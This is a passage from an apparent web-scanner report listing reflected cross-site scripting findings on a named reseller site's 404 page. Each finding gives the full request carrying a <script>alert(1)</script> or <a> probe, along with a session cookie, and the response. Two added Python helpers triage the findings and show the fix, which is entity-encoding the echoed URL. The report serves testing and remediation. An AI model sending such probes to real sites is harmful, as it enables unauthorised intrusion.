Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5399e<script>alert(1)</script>8cd0023ef6c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/search.php5399e<script>alert(1)</script>8cd0023ef6c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php5399e<script>alert(1)</script>8cd0023ef6c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2793. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ff4c9<a>cc91c080e89 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchff4c9<a>cc91c080e89&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchff4c9<a>cc91c080e89&opt=2 was not found on this server.</p>
...[SNIP]...

2.2794. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5be00<a>da0f00c678f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...5be00<a>da0f00c678f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...5be00<a>da0f00c678f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2795. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 637cf<script>alert(1)</script>3e7fb7248a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&637cf<script>alert(1)</script>3e7fb7248a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&637cf<script>alert(1)</script>3e7fb7248a7=1 was not found on this server.</p>
...[SNIP]...

2.2796. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b113c<a>c67168d0cca was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b113c<a>c67168d0cca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b113c<a>c67168d0cca was not found on this server.</p>
...[SNIP]...

2.2797. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a7bc<script>alert(1)</script>781e1afce1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9a7bc<script>alert(1)</script>781e1afce1f/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9a7bc<script>alert(1)</script>781e1afce1f/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2798. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40546<script>alert(1)</script>368659ab562 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/440546<script>alert(1)</script>368659ab562/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/440546<script>alert(1)</script>368659ab562/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2799. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a286c<script>alert(1)</script>bad01f69978 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2800. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15d97<script>alert(1)</script>52b28975d9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos15d97<script>alert(1)</script>52b28975d9f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos15d97<script>alert(1)</script>52b28975d9f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2801. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6915a<script>alert(1)</script>be675873c00 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/search.php6915a<script>alert(1)</script>be675873c00?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php6915a<script>alert(1)</script>be675873c00?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2802. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4c35d<a>e4f5c423018 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search4c35d<a>e4f5c423018&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search4c35d<a>e4f5c423018&opt=2 was not found on this server.</p>
...[SNIP]...
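
Every 404 response in this section reflects the complete request target, path segments and query string alike, inside the paragraph "The requested URL ... was not found on this server.", so the findings listed against one path are a single sink reached through many inputs rather than many separate vulnerabilities. The items the scanner grades Firm (the <a> probes in the Submit3, keyword and opt parameters) land in that same paragraph, which reflects <script> verbatim for the neighbouring inputs, so they warrant a manual retest before the lower confidence is accepted. The Python below is an added triage helper, not part of the scanner report or of the site: it classifies a finding from its request target and response body and groups findings by sink. The sample inputs are the request/response pairs from 2.2799 and 2.2802 above plus one constructed variant showing what an entity-encoded echo would look like; the names classify, dedupe and SAMPLES are introduced here.

```python
import html
import re
from collections import defaultdict

# Probe shape used throughout this report: 5 hex chars, a tag, 10+ hex chars.
PROBE_RE = re.compile(r"[0-9a-f]{5}(?:<script>alert\(1\)</script>|<a>)[0-9a-f]{10,}")
# The not-found paragraph that carries the echo in every 404 response above.
URL_ECHO_RE = re.compile(r"<p>The requested URL (.*?) was not found on this server\.</p>", re.S)


def classify(request_target, body):
    """Classify one finding from its request target and response body.

    Returns (sink, status):
      sink   'not-found-url-echo' when the whole request target (raw or
             entity-encoded) sits inside the not-found paragraph, else 'other'
      status 'executes'  raw <script> probe reflected
             'tags-only' raw <a> probe reflected (the scanner's "Firm" case)
             'encoded'   probe reflected but entity-encoded (not exploitable here)
             'absent'    probe not reflected at all
    """
    m = PROBE_RE.search(request_target)
    if m is None:
        raise ValueError("request target carries no scanner probe")
    probe = m.group(0)

    echo = URL_ECHO_RE.search(body)
    echoed = echo.group(1) if echo else ""
    if request_target in echoed or html.escape(request_target, quote=False) in echoed:
        sink = "not-found-url-echo"
    else:
        sink = "other"

    if probe in body:
        status = "executes" if "<script>" in probe else "tags-only"
    elif html.escape(probe, quote=False) in body:
        status = "encoded"
    else:
        status = "absent"
    return sink, status


def dedupe(findings):
    """Group (label, request_target, body) triples by (path, sink).

    One ticket per sink is what the developer needs; the per-parameter
    entries become the list of inputs that reach it.
    """
    groups = defaultdict(list)
    for label, target, body in findings:
        sink, status = classify(target, body)
        path = PROBE_RE.sub("", target.split("?", 1)[0])  # drop the probe so variants share a key
        groups[(path, sink)].append((label, status))
    return dict(groups)


# Sample inputs. The first two request/response pairs are copied from findings
# 2.2799 and 2.2802 above; the third is constructed to show an encoded echo.
_T1 = "/detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php?keyword=search...&Submit3=Search&opt=2"
_T2 = "/detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search4c35d<a>e4f5c423018&opt=2"
_T3 = "/detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php"
SAMPLES = [
    ("2.2799 REST URL parameter 3", _T1,
     f"<p>The requested URL {_T1} was not found on this server.</p>"),
    ("2.2802 Submit3 parameter", _T2,
     f"<p>The requested URL {_T2} was not found on this server.</p>"),
    ("constructed: same sink, encoded", _T3,
     f"<p>The requested URL {html.escape(_T3, quote=False)} was not found on this server.</p>"),
]

if __name__ == "__main__":
    for (path, sink), items in dedupe(SAMPLES).items():
        print(f"{path} via {sink}:")
        for label, status in items:
            print(f"  {status:10} {label}")
```

Run against the two real pairs and the constructed one, all three collapse into a single group keyed on /detail/4/themes/kosmos/search.php and the not-found echo; only the status differs. A finding whose probe comes back entity-encoded, or not at all, is the one to close, not the Firm ones.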

2.2803. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c524f<a>18b66a64a46 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...c524f<a>18b66a64a46&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...c524f<a>18b66a64a46&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2804. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3664c<script>alert(1)</script>7090ebdb600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3664c<script>alert(1)</script>7090ebdb600=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3664c<script>alert(1)</script>7090ebdb600=1 was not found on this server.</p>
...[SNIP]...
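
The defect behind the not-found findings in this section is a single one: the 404 page interpolates the request target verbatim into a text node, so path segments, query-string names and query-string values all reach the page unencoded, which is why even the name of an arbitrary parameter reflects. The server here reports PHP; the following Python is an added illustration, not the site's code, that reproduces the echo beside a hardened rendering of the same paragraph. The template, and the names render_not_found_unsafe, render_not_found and headers, are introduced here.

```python
import html
from urllib.parse import urlsplit

# Minimal stand-in for the not-found page: only the paragraph that echoes the URL.
PAGE = (
    '<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Error 404</title></head>'
    "<body><p>The requested URL {target} was not found on this server.</p></body></html>"
)


def render_not_found_unsafe(request_target):
    """Reproduces the behaviour in the responses above: the raw request target
    is dropped straight into the HTML, so any tag in it becomes markup."""
    return PAGE.format(target=request_target)


def render_not_found(request_target, max_len=200):
    """Hardened form of the same page.

    - keep only the path: the message does not need the query string, which
      removes the 'arbitrary parameter name' input entirely
    - cap the length so the page cannot be used to echo large payloads
    - entity-encode for the context it lands in (text between tags); quote=True
      also covers the case where the template later moves it into an attribute
    """
    path = urlsplit(request_target).path[:max_len]
    return PAGE.format(target=html.escape(path, quote=True))


def headers():
    """Headers to send with the hardened page: an explicit charset so the
    browser cannot be steered into a different decoding, and nosniff."""
    return [
        ("Content-Type", "text/html; charset=utf-8"),
        ("X-Content-Type-Options", "nosniff"),
    ]


if __name__ == "__main__":
    probe = "/detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3664c<script>alert(1)</script>7090ebdb600=1"
    print(render_not_found_unsafe(probe))
    print(render_not_found(probe))
```

Output encoding at the point of rendering is the fix; rejecting angle brackets on the way in is not, because the same value is reflected from a path segment, a parameter name and a parameter value, and any one of them can be re-encoded to slip past a filter.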

2.2805. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ff9f7<a>86aa1ec3894 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ff9f7<a>86aa1ec3894 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ff9f7<a>86aa1ec3894 was not found on this server.</p>
...[SNIP]...

2.2806. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27912<script>alert(1)</script>7953fd773b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail27912<script>alert(1)</script>7953fd773b9/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
